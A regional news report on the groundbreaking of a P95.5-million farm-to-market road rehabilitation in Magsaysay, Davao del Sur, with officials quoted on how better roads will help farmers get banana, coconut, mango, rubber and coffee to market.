Another road network is expected to facilitate easy transport of farm produce in Davao del Sur.
This came after Davao del Sur Governor Douglas Ra. Cagas and Department of Agriculture (DA) regional Director Ricardo M. Oñate, Jr. led the groundbreaking of P95.5-million farm to market (FMR) road project in Magsaysay, Davao del Sur.
The 8.7 km FMR rehabilitation will cover the barangays of Tacul, San Isidro, and Poblacion and under the infrastructure component of the DA-Philippine Rural Development Project (PRDP).
Oñate, who is also the concurrent PRDP project director for Mindanao cluster says the FMR plays a crucial role in agricultural production as road access connects farmers to markets.
“Better road network can reduce travel time and postharvest losses which in turn increases farmer’s income,” he said.
Governor Cagas for his part says infrastructure support such as FMR will further boost socio-economic activities in farming communities in the province considering that most of the rural households are dependent on agriculture as their source of income.
Construction, rehabilitation and upgrading of FMR had been identified as one of the priority interventions based on the value chain analysis conducted with key agri stakeholders in the area.
The proposed road section once completed will support transport of major produce such as banana, coconut, mango, rubber, and coffee. The VCA shows that major economic activities in the area is the “buy and sell” of these commodities where barangay Tacul serves as consolidator and deliver it to the market center in Magsaysay as well as the neighboring town of Bansalan.
Tacul is also the entry point of some barangays in the town of Tulunan in North Cotabato where trading of farm produce is also taking place.
